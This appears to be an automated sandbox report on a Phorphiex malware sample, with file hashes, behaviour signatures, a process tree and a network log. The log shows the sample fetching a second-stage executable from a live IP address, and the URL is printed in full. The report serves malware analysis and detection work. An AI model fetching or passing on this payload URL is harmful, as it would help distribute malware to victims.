Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
18/12/2024, 23:37 UTC
General
-
Target
dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
-
Size
37KB
-
MD5
635a58029ce832a74876c3ffec0c3acf
-
SHA1
bb00046e17cb65703a4435d6e30df21d7a185159
-
SHA256
dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764
-
SHA512
50186fa0f438b2d74716df89374b6f2106b7ec6d600ed62dd45bd7c6fd8875150e794d329dcebb755dc30bd21c386dd792d8fa6d3868408e26eb66142c43c7b0
-
SSDEEP
768:lRrgLWAeXOMhbcqnLPsJLWRvdgLoeSxLNLDWVTv4bBOaec8LPXa:3GeXOFqn7Qevd3e+taz4fec8zK
Malware Config
Signatures
-
Phorphiex family
-
Phorphiex payload 2 IoCs
-
Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
-
Downloads MZ/PE file
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious behavior: MapViewOfSection 25 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\wininit.exewininit.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch3⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}4⤵
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe4⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS3⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted3⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted3⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"4⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs3⤵
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R4⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService3⤵
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork3⤵
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"3⤵
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation3⤵
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe3⤵
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe2⤵
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe2⤵
-
-
C:\Windows\system32\csrss.exe%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=161⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe"C:\Users\Admin\AppData\Local\Temp\dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Network
-
GEThttp://185.215.113.66/tdrpl.exeRemote address:185.215.113.66:80RequestGET /tdrpl.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 185.215.113.66
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 23:37:17 GMT
Content-Type: application/octet-stream
Content-Length: 80896
Last-Modified: Tue, 12 Nov 2024 22:30:59 GMT
Connection: keep-alive
ETag: "6733d723-13c00"
Accept-Ranges: bytes
-
185.215.113.66:80http://185.215.113.66/tdrpl.exehttp
HTTP Request
GET http://185.215.113.66/tdrpl.exeHTTP Response
200
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
79KB
MD50c883b1d66afce606d9830f48d69d74b
SHA1fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5
-
Filesize
109KB
MD5647dc26d105059018bddb464fbc9c17e
SHA16de05df3bb3b51650e8c278acc968a4d95bb6e18
SHA2568d30af2c94c141181ab9f828e8d00dee7868b4cbe61f9841e1dd3f884833b123
SHA5128d95bfc5adb4fb331d4fbc4d809723a02ac426fb5ae3c68986e3a22cb5d03d773c97576ad80d782e1ffe98819cfd27b63d05fadfa30c7e416f8cade4ed52bcc8
-
Filesize
52KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
52KB